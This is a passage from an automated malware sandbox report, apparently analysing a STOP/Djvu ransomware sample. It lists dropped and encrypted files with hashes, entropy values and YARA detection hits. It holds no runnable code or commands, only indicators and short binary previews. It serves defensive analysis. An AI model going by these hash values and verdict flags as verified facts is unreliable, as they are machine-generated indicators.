                                                                                                                          SSDEEP:384:eQAjKuFY4/6hWUM6gzjD5GBKpP11cyTVtUpOAJ5vUBkR4Bl8Ubl7fqky8CVvNMrj:eQxuFt6h66UjD5GcpPLcyTVtUpOAHMBt
                                                                                                                          MD5:057BB02B71E36FBA0BA4F41CF1F7D9CC
                                                                                                                          SHA1:F5AED7082554C29DDF669BBEBD9721837147B33A
                                                                                                                          SHA-256:48A686AB4DE5CD17059A49B7194984179D625B51475FF0C33351A8A10E4B5A69
                                                                                                                          SHA-512:5A2572C705720128638D72B8B2225958DBAA38AA9A28469E6943FA6E8F8F45A7F53720F4C79A40BB98F5AB2A786055AAD620F7FAE0FF8FA959CDB1F828475C9C
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:MS-DOS executable
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1601198
                                                                                                                          Entropy (8bit):7.987447791414598
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:jIsTqZ70SeiN9YqxCCg83udcWXDYajPF2410wuRpGfFki94qSe/wsNfzUf:jIz24gQu3TPZ2psFkiSqwozm
                                                                                                                          MD5:76515A56AE9CAAD2DB57BEE594C3A926
                                                                                                                          SHA1:34207DBB219A28B24B11980932BCC073446CA9E2
                                                                                                                          SHA-256:3AC489B0AAA7C352C0B124BFEC0AB532962FB77A4F70F64242F432444C6347B2
                                                                                                                          SHA-512:A1C967ED592B83E72FE74D00563D43F544A92546412B6454AA6D112DB790541C5ED1B24922F7CE3F0D9FB3F48744226D3C3F097B16B6AFA4A90F949BB35C8079
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65188
                                                                                                                          Entropy (8bit):7.9969931080654435
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:1M7p+MNxA1RK11ac7QsNFgxVgt/Y6Vb5z+5+wJGCl0SOYxdaZRIb:jMNss11ac7PrOVgt/TU5UCVXxdyRIb
                                                                                                                          MD5:C6AED58376525D692EECCFB51A13ABB4
                                                                                                                          SHA1:C195CCC7BF727518FE95BDF6A80D5DEB1540BCC0
                                                                                                                          SHA-256:0D7DA926F598D4DA1EBB1C72C2C38AA738D4F016208C1A13A49969244EB8BA4F
                                                                                                                          SHA-512:574C7F42A8831A5F45A7DFF7220208774FA259F2C011F292B5427ED2E3072E7CDCF08B4F89B345A1C3F35DC6C6CE332FA09C58E5B4F6DE66C9979CD03098534A
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65188
                                                                                                                          Entropy (8bit):7.997102900259094
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:MMOl4Br5TkxUN9lU25djMLJVCB7OUsO6HEIX7SW3MiVwBIPx:CmZKS9V7Ou8EIX5teBIPx
                                                                                                                          MD5:053A2DFFE138782F810D91F8D5B4F845
                                                                                                                          SHA1:74C1F1C57CB2CABB460A0B42B773FAFDC543532F
                                                                                                                          SHA-256:BDFBE44FE1749DCE816DA061BE9D44A8A4DEB4E98D344A3E581994F2B5CBA712
                                                                                                                          SHA-512:DBB572DD35D895713B9943388BC52965AF1649642BA2877D0907A8BDAF9A0168EEDB65AF8AB585D5E59E9DE8D9AEB993540C713A056EB0AA255DAB51FA6E84D6
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):74525
                                                                                                                          Entropy (8bit):7.99762408349614
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:rdXUGKnJAktTXUsDwFbuSzrY02SOL/cSwWcHiqKhkSBqap80Rp:pXUGiAiTXNwMmr8hcScIIamGp
                                                                                                                          MD5:4C0743AF377C4707D98478EEE77944E8
                                                                                                                          SHA1:D5DC63FC2F3FEF3481829DD99491FE4BCDAF8BA5
                                                                                                                          SHA-256:8F8F1845C04884B997477398272F058DC7670794E871AD741553A4AB7E9F5E27
                                                                                                                          SHA-512:4B2949B9E0A4D9D0A4872FF61F6F0C312392F06025FA9EC947A0A0F50A1AEE73B448203A241BDCBF95E20FED095A50AEBD21067565B1EEEFBE490A70AD620797
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65188
                                                                                                                          Entropy (8bit):7.996928043079858
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:hD93R3q7YNn/znoF6JE3X+tJz/7NQnhzP/CdKUlHvdBipzODNau3s7rpDiF:X3EYNn7062H+nQzPhSdMpzLu3s7rpDq
                                                                                                                          MD5:F15A38844C90FF1805B18FCDF4442C31
                                                                                                                          SHA1:D4486C45DC0215A9D0F121D3D2BC2A9E4516C625
                                                                                                                          SHA-256:5D44FEE52C9C4A36070F913ADFC0BC7940CB8B00F46E5977905098FFA7C4C9F4
                                                                                                                          SHA-512:D61ED904A3DA821DF9E4B92F573365371B8BEA5B8F06D64A4AD760EDADC329CFEB7C83600FD3C18C18C714CB43D44A290A95CB920B23CD2223DCFC251A4297D6
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):74525
                                                                                                                          Entropy (8bit):7.997653087868866
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:scg2wh7Ye0axLxnhKW12xZxPg6d5lQgl7ffClcQU0ODdoAWYxM9kQ5UAdt:scBwhUHaf8W12xXPbR5qltODtM9kQukt
                                                                                                                          MD5:1528CC3E3F04D24BE773CEBD946E9B8C
                                                                                                                          SHA1:C75060880353E9332947B1E556735034B597147D
                                                                                                                          SHA-256:BAA3E0F6792D47FAD8F6D2D306C50134C046D7296A2F7D7A4B62C71326661553
                                                                                                                          SHA-512:E93C052572C01C129F73BAE7760F39B81A139C1371AA87E0BB9887F0B92859DC0C84DFD373C2D152999893F321D94D90FE6B7CBA0071CC9A8EA0D14C29428A7B
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):74540
                                                                                                                          Entropy (8bit):7.997377743762606
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:Rt3OzRYPrBO3lc4nF8yg+oH0HVRC45631Ek:/OzRY1yc4nyy7oH0HVRF56FEk
                                                                                                                          MD5:22B7FFAFEF865116427AA8E1B704208A
                                                                                                                          SHA1:30008894B7BF9EA2B91CD7CD2DAE82F3194A0D40
                                                                                                                          SHA-256:1CA2AE6E66B2F034FBF204539BBAFDC515D98902D016F921E364F42C9A7A23C5
                                                                                                                          SHA-512:1ED52E6705B8D743ECB7F48343A744A36765D0511C322E208BB9EB24FDD9255B714FA95041FC5345666CB732E53D9325A43E7C176C3B7D9F083D1ED53CAD5544
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):74525
                                                                                                                          Entropy (8bit):7.997343302822231
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:MkynpxqaCnbFIrl6oKcmm8pFDHTc4r+Rify5DZ81NNXSBqe90mhFBbhEWX1m:M5pcaCbacoxmXDHQ7rZ8HNYOx
                                                                                                                          MD5:676C74169967613BEAAE4E55B7356576
                                                                                                                          SHA1:1817E1AE055DD0A2F31E0BEE263BF160F81F7991
                                                                                                                          SHA-256:579884E611790B89A7ACE2588E0ED541366CF412A760E84A2B21666BC4119A09
                                                                                                                          SHA-512:401626E8CC195E24AF62877447B8376D590DBDB62EAE50B97C4342BF35730D26DB925F6A0C9C956D2C0C5D0B62A2996F056A0B45BACA9E6DBE720E22A8A13BDF
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:MS-DOS executable
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):42164934
                                                                                                                          Entropy (8bit):7.947662803306286
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:786432:XwQNeYDxVRrMPJy7LVV4NDDmdrZy9wOtg5gGOdjtjSNu4GIluUNj56I59E:AQcWxDMPnN+dk65gGUjku4vNjLjE
                                                                                                                          MD5:3F11CDDCA921671B0F182E67C6658425
                                                                                                                          SHA1:2CF0C4A725FB93637037BF12F505A64358E800CE
                                                                                                                          SHA-256:8318085E88234BA08A21E8E449C946C91C4C629099F69348CF6C71334BCA0F59
                                                                                                                          SHA-512:15F2D2E59FB51522A35435412978BC5CEDDCAB0E18D5D40DA60B39AC2E60A2E9F069EA93D6052DE17F9ABB432B8101A828A319C858E155D996A8396FB9A8F6D5
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1031
                                                                                                                          Entropy (8bit):7.791444397670549
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:tarFjT3p29DMuyO3WYsKIS8Q0iprxXF+0hfoozmgv+bD:wJj929QWWZhxinF+0hf6BD
                                                                                                                          MD5:8DE5FA156277731D6ABDA92994182EA1
                                                                                                                          SHA1:357779537E3BC7A1238369B162452594543E862B
                                                                                                                          SHA-256:9318ED9E127F3AB0A97CED2968BC0BE30C86B18F75E4D5D54B78F836F22B1783
                                                                                                                          SHA-512:3F1C43F15ED595E98C3328B777294426A26CCAEA621086631D973DB0B7069B3963CBC6FD70199018146C27FF4718679CCE536CF15FE62F0A5D0BBFD4FFB4B847
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6130
                                                                                                                          Entropy (8bit):7.966504954439117
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:Bgkrnsac3ui3XHTvyKo49UB/mdMZeAAZHrrbekpZ17dMNlcaCgzvpPuXZbsQCNzn:BRnsaPiTqKJdMZ3OHrnpZ172NxjvpWXs
                                                                                                                          MD5:956439A2AF2EC5F8FD5CB92EC75C80A6
                                                                                                                          SHA1:6D584F6106C4EB19D07DE2BD32BD794ED2486645
                                                                                                                          SHA-256:08549B360A06A1169BD482981C1009BA7131705ED87C97B815582E8909A9F8E7
                                                                                                                          SHA-512:F3EBA9EDC5938E6244A25A470E0B0A2AD50C43A4CB399206909F1E368D9A992EAFE73FC1641A8556E316CA7C810EDEB2717FE4958B1553EE54B576C7840CF468
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6130
                                                                                                                          Entropy (8bit):7.971644330675514
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:j3JRx+TXqBeUx5JdQGwLajo2cZBqBU4HJy5DYbP+DIbCYbnu6hqTBRwUamjrm:TJR6a0Ux5Jdjn/BX2EqIbCC0BRJa
                                                                                                                          MD5:A2933FA70957AF6A556505C22DDA5071
                                                                                                                          SHA1:67F0ADF5F3379F7E040B41CF7B4C05BA6D01803E
                                                                                                                          SHA-256:E65A42D1B72BDB2651D3C6C3EAAFC6BE3EC8B576C302E4C4F69C4423E56ED7EA
                                                                                                                          SHA-512:B8A92612E47263A752F00C8056298E69A7F7F3097B75623A01C3C07A846B7682B01396BB2D5ADB40C2D47DF3DED13AE801B56EA485C57349C4AE615D717964EF
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6130
                                                                                                                          Entropy (8bit):7.969210732176863
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:yNfKdE3Chv3OX2NPj5RmiH0qWB8vNYgl3zrgI5hKl0sBJ6sPHrsE8aWzfwT4V115:bE3Chv+X2VjrmNCi0vnql0sBFvdkwTsd
                                                                                                                          MD5:731208DB8E5F4B056A29B000B6F67974
                                                                                                                          SHA1:928F35917B1A07C1D889823F508594418CDF885A
                                                                                                                          SHA-256:D64A76C0F77E01CB468CF39E88EEF98F191CF78B08B5723A4866EB61DCDC09F6
                                                                                                                          SHA-512:083D8131E4F5B875F804B4557977951669ED7F31BB98E599688C62AF2DF34D5E28FCCD3DA1AD4762397F5C0A19905B19A7FA743CE4B896ED2FA3A900BA1B6E1D
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6130
                                                                                                                          Entropy (8bit):7.9717368275538085
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:6N4YXcLxnenyNtSeGoQnZ9gaIGfVSPR3o+yTaUhI3TzU4x8eHETp5XaSwrrQgpr0:MQxe4tSv9YcVkR3LyTOTY4AT7lASm5m
                                                                                                                          MD5:9FC21C4960B54572B4E2C4659ACE873A
                                                                                                                          SHA1:9A4E84BFD7C56C1CD0FCD3604C8EDAFB3FDA0AEB
                                                                                                                          SHA-256:78942BBFEA6C1BF52CF16266EA334EBB6097F53E132ED7A9930DA7D17874759D
                                                                                                                          SHA-512:675032ED5C8783A737769D3D3ECFA6913293D92294A9D6978946052EACF88722B71D54696751EEB1B3350A62864ED1E70B8E58411D9613F5E51DB6E13C80F090
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1150976
                                                                                                                          Entropy (8bit):6.657215273984881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:ZBUIKn/vwOXGUXAjCymYZiVtElVIBT2roqnTSSxWeT/dRPOO8UWQHUq7:F0dwAYZt6C31WeTVRPOhU7Uq7
                                                                                                                          MD5:DE93E8A0692DB2C2F178270B8DA7B5D7
                                                                                                                          SHA1:21DF7A70852C9D47B3423D14005BF67A69E6FDCC
                                                                                                                          SHA-256:1CA8AD78274A829697B8381E96B914FEA1A65B5B2351F536325D2143D689426E
                                                                                                                          SHA-512:55B21170027F3E3DC2CA8F1D6678B054F270CA7D5E9AC71EEC7A4E630ED007A0DE07BCB8134431FB4A0D4C99FABF235911CC0322080920BB407748E4422B0D4A
                                                                                                                          Malicious:true
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Author: Joe Security
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Author: unknown
                                                                                                                          • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Author: ditekSHen
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(O..l...l...l....7.f......+/..*...h....9.m..../.m...a|..Q...a|7.s...a|.......&.n....8.n....#.M...l.........d...a|3.m....6.m...Richl...........PE..L...7..]............................AA............@..........................p............@....................................T...............................,...`...8............................Z..@............................................text............................... ..`.rdata..............................@..@.data...X........d..................@....rsrc...............................@..@.reloc..,...........................@..B................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):26
                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                          Malicious:false
                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):67138
                                                                                                                          Entropy (8bit):7.9973272342070505
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:9grPcH/R4F13rHKInCfziQ0bMzSrFfghVbfm9pVjgnd0:SrUH/RQHKo85hVTmfVjgnd0
                                                                                                                          MD5:3BC7CC432D098BAAAB1CB432BA595471
                                                                                                                          SHA1:3EA72FE6B12BE5A86C42607449D3461943827C38
                                                                                                                          SHA-256:920B142174C6C27F696EB47D8A556B9DC725798E9C7ECF0EB47D92B27E070DFC
                                                                                                                          SHA-512:704BFF63F25D655B02382D11B5B04A7FC80850AAF9DC7850C4406614A3BD3B53AE3FBA01AC22EC6E990CF00BD26C152C9FD1A588D7F3A0AE5E0BF4F3C8BB9683
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1071
                                                                                                                          Entropy (8bit):7.778236374380961
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ymSDa4eouoIlB+8cqmpsvhtb/RWD2eyZkxRxgbD:yxcFobqQs7bgDZyQRx6D
                                                                                                                          MD5:F19FFD555C4424879590327139FB3278
                                                                                                                          SHA1:9E424D7F4E1D97A9D9F5DCC285365A60AD249943
                                                                                                                          SHA-256:9530490356F6BA65C93701A2CA680589365AD954F816CF223CEC7761BEB665F8
                                                                                                                          SHA-512:225C8918E2838377BD39C14499741B5DA405CAB86FD6801BAC635FA854BDE98593D4B57B73F243A6E5170F29BB16F24A3DE4F9EB0C70763DC2638CA26AD6F141
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):370
                                                                                                                          Entropy (8bit):7.191971716539646
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:s8y5CHJfToZDcIxTtun8/CEffAfWbUPB2waUCshdJq5PDTcii96Z:DH6vTQ8ZYfWbpONq5bTcii9a
                                                                                                                          MD5:46C0E97934485ACF5707D3348BCEB979
                                                                                                                          SHA1:5355282ECFFDB8D0194F1091F4634157192E1E5C
                                                                                                                          SHA-256:068B9C584FFF1C3EC2316B8447D74A174D9324FA28C6A4287EB06DE25313F5E1
                                                                                                                          SHA-512:40FFFCCD071976FBC904AE8E88CAD8841D15E9396A61E2ACFAF4E46918A7091BFC300777327A5DF0AC3053433116E518ACF79A092BB0B60B66B36FB396AC65FB
                                                                                                                          Malicious:false
                                                                                                                          Preview:%PDFT...i*.<..~.....*X2..W.z..."D......d 52.....|...V.",C/[....c,..B5V....U.WA.s#.cO...+t.TJ...(...*&..-.<.Y?4.M.....#+4.x.#.b;&Jk.3..2y.x0..H&.l....R%.A.B..0BF....b~.6...6o.).bwv.'..Id..YoF..Xb.n..|A.]...[.l...@.h.B...B....".....1+.lq..dd..c.b..Y..n....2.+?...7...v.CphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):388
                                                                                                                          Entropy (8bit):7.363595084817419
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:oCINIjC+ZaY+Kcc6+KYEqiHS2YEzzq5bTcii9a:oajC/Y+Zc6+KYjMGbD
                                                                                                                          MD5:84E732773D6B12D0070AACE833230FC7
                                                                                                                          SHA1:A78BC4910A1B3369C4E268EC0DDC6ED96452B7C0
                                                                                                                          SHA-256:BC3DD1B510B2A889AD365521C462515AF0B115B00B04D665C91E4594DF30F30E
                                                                                                                          SHA-512:E88976992609880174D198782AB737A6F1B6E9AB288134ABAAB329006253C9DCA534DE38F3DD907244904B4054798D6003AA5AA1564797F63BD1A19C97DFADF0
                                                                                                                          Malicious:false
                                                                                                                          Preview:%PDFT.!Ky.?...&zeE..S..1.y\a...~..x.N.R]...`.{.Z.S.Lv.0#..$..J.'/*.3.0PQf....oO...>....y.<U..O.i'..5..."...gW.!.:...]..U..<.U..1.d...j..H@.`.$..;.(/.d.X9.ok...c..0...e.#...n.G.9..E..G......3...GB.....9-.za...J....H..q7..wd.^H:.=.A.T.s.9...x.#OC0...._;.Z.)...oa...A...0.:j...]..7.8}.:.F..k.o...q.B..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):350
                                                                                                                          Entropy (8bit):7.223972817834662
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:QI2LUgwcKXPG41zqaPFh/0WjZqOf5cPJWWXbbxPn8N9Zwt7+MImGQGnIcJmOW9pd:QLL2xnXPFh/bZ1xqFbdf8N9I7+JmVcJO
                                                                                                                          MD5:A6CB27CC420439489492489A7ECE5D83
                                                                                                                          SHA1:4C10EE2405974C9B99EA091FE6425E0BE6E3893C
                                                                                                                          SHA-256:836EB84918272C8B04105E541CEB175EE90E09D12EEF8017BDB1F9FA0F675E50
                                                                                                                          SHA-512:131DA30DBF7A2F9074F3CCE15D823B1455B65F5D72FABF3BE2F284F55801818A50B649294A7446DBD413B465BFD2DFFFC5B63E58B246B5DADEC2B41479E2D3FC
                                                                                                                          Malicious:false
                                                                                                                          Preview:..j.o..8?t..G<.........-.T..m..\.kEq...8...E....|mw.+..n.d....R....nU....t...Z.........|...Y.y.[.x..q...~..@8...:..[~.v...1..v.".7.......h..T.x.....h6..X.pi-..2c...#."C.g.:.y.=. ."...L....D.=+Td...>.tr....%A,.9.-.%.Qc.|:A.4...u.g=..@.1...dZ...0mzZNi.._..E.aHphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1352
                                                                                                                          Entropy (8bit):7.870620637406578
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Hk4p64mnFwyqhCiTmiaKTFk1sYCUfXbUA5vhe4+u2CiiU3dseb93eHbD:Hk4phuqyQCiTmuTFk1zrUAN84+u2Td3i
                                                                                                                          MD5:CE723EA7BD9C946D873C83F758E6F87A
                                                                                                                          SHA1:BCB6319193F20A2B13AF24DB3A7CFC69B6C035DF
                                                                                                                          SHA-256:F171E73C60BDA1EBFC38D820C0C8396F466CD46C2665B5433CCC8179214DF605
                                                                                                                          SHA-512:BCD9D842A1A8EE71CF109D94A43B468259A71EB86A78E4B31B4613AA334ED36FD27B0626D9A4FEBC3837CB6D22B47694A62BA8575096DD45BC708CEC3729A233
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2424
                                                                                                                          Entropy (8bit):7.910992894872235
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:am3zxi1YBmbq/QwEKHiq5do7d+V17lfvGMLPEDf/rL5XKu1TpAjxmtEnJD:33zxetq31Cq7VxlXBwDXrLFKu1TRt4h
                                                                                                                          MD5:A1F5F047FF31E7A33FB57865F5C80484
                                                                                                                          SHA1:43D87B6304290C0B3EB65AEEBE52CD97D6BE27F7
                                                                                                                          SHA-256:C12284B52570894B68EE8A35A83E4D544ABEC27762AC484AF3B3113CA2BD2911
                                                                                                                          SHA-512:C2EAB35FB6E696B72B1F049E3B5D7943C03DCCB04FD3EFD6164BAAE093D518D380F9B868138878801C32B602C100D3B2C9D8042F8EFD405495BB5981D8A196AC
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2381
                                                                                                                          Entropy (8bit):7.931925300137616
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:OpXqZ3QzCdwQBDyblPzaG6FB9E+dWp7ivtpN/FzRkQs8D:iXWQzCW0Qw9944t5Kq
                                                                                                                          MD5:DE95EDFA8483AB6484201165EC7D9814
                                                                                                                          SHA1:F80F93CC33D6EC7FCDC07476BFCA5252602E5934
                                                                                                                          SHA-256:D6E1FADE77B58A16C1DA7F4C07CCEB4721D1A02BBBD54B49A7DA696202365F99
                                                                                                                          SHA-512:A897DE0F07B168B8E79FC2BE152022EA4A0F00A98AF45C1FAEBD09D9170530A51A110BEBD3491AD651B30943EBFA26E4163F0B3DF6B6FF952865898E860DEDCE
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2398
                                                                                                                          Entropy (8bit):7.917170968085167
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:Uc0ZY0QsrJLLPtKx4WZKyjdGXiTV1Z/ldcrGBhxzMApsFYv5OkV0WHGED:U87YMx4k9dGXinZ9dOIPJpsYRPKwh
                                                                                                                          MD5:6C976E54C37FD581CDAD4448A215B953
                                                                                                                          SHA1:9824F99801653C5DDE241AA6F54466FC907A524F
                                                                                                                          SHA-256:42AAF8837A8A707829C7717DF200EBB5EB2DB8D2F82CD16ECF4FDF636565C9F4
                                                                                                                          SHA-512:0986E75950DF9274C8A8369464E3D7D7BB2F65D92CD8D6DE15B76862E0B662AFF586A78FB8D0D6FD6F688DBD0B8F24FE5872D08DD224034DA98AAC32BAA0F132
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1358
                                                                                                                          Entropy (8bit):7.85514337507523
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:0Tj4FBSaJfH/FGkvZAwSv3s6nHC2W6oIhS1N2+jNj6Rg2mUPxvVGubD:Uu3V/FGkvOwxYHDqV7tUPpVdD
